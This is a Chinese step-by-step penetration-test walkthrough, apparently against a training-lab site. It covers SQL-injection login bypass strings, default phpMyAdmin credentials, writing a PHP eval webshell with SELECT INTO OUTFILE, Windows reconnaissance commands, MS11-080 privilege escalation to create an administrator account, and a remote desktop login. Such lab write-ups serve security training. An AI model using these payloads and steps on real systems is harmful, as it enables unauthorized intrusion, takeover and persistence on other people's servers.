0x00 目標站點www.test.ichunqiu
0x01 嘗試登陸系統
-嘗試弱密碼登陸
結果:forbidden!!!
-嘗試萬能賬號密碼登陸
1‘ or 1=1--+ 和 1‘ or 1=1--+
結果:forbidden!!!
從登陸入口得不到其他更多的有效信息,所以從其他地方找突破口
0x02 使用御劍后台掃描工具對站點進行掃面
-開始掃描
-掃描得到一條目錄信息:http://www.test.ichunqiu/phpmyadmin/
-打開掃描出來的鏈接,發現是phpmyadmin數據庫管理程序
0x03 新的突破口:phpmyadmin
-得到phpmyadmin的登陸入口,當然就是想辦法登陸進phpmyadmin系統
-嘗試使用默認賬號密碼root/root進行登陸
-成功登陸進系統
-既然登陸進了phpmyadmin數據庫的web管理頁面,那也就相當於可以任意的查看整個數據庫的內容,所以,嘗試在數據庫中去找到剛才想要登陸的系統的賬號密碼
-結果發現:當前web應用程序使用的數據庫是個空數據庫
0x04 利用sql語句寫入webshell
-既然從數據庫里面找不到登陸進后台管理頁面的賬號密碼,所以只能從phpmyadmin提供的功能入手
-執行sql語句:select @@basedir 查詢當前數據庫所在的目錄
-得到目錄在:c:/phpstudy/mysql
-根據得到的數據庫所在路徑可以猜測,整個網站所在的根目錄的路徑是:C:/phpstudy/www
-既然猜測到了網站的根目錄,那么嘗試利用sql語句往網站根目錄下寫入一句話的webshell
-構造的sql語句: select “<?php eval($_POST[‘pass’])?>” into outfile “c:\\phpstudy\\www\\shell.php”
-成功寫入webshell
0x05 使用菜刀連接webshell
-成功連接上:getshell
0x06 提權之前的信息收集
--獲取主機名:
-hosname
--獲取所屬域信息:
-systeminfo
--獲取系統補丁情況
-wmic qfe list 獲取失敗,沒有權限,但是通過前面的system也能大致了解系統補丁安裝情況
--獲取本地用戶組:
-net localgroup
--獲取本地用戶
-net user
--獲取本地管理員信息:
-net localgroup administrators
0x07 利用exp:ms11080 獲取系統管理員權限
根據前面對系統信息的收集和判斷,在當前系統利用ms11080.exe來提升系統權限,使我們獲得一個管理員權限的賬戶
-將ms11080上傳至服務器的一個可讀寫的目錄
-執行ms11080.exe(這個exp是一個不支持自定義命令參數的)
-成功執行exp,創建了一個具有administrator權限的90sec的管理員賬戶
0x08 利用新建的管理員賬戶90sec通過3389端口遠程登陸進目標系統
-打開mstsc程序
-連接目標主機
-登陸目標主機
-成功通過遠程桌面連接目標系統
